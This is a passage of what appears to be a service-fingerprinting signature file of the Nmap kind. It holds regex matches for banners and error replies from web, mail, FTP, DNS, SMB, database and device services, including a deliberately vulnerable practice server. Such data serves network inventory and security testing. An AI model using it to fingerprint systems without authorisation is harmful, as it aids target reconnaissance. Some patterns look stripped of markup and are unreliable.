Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 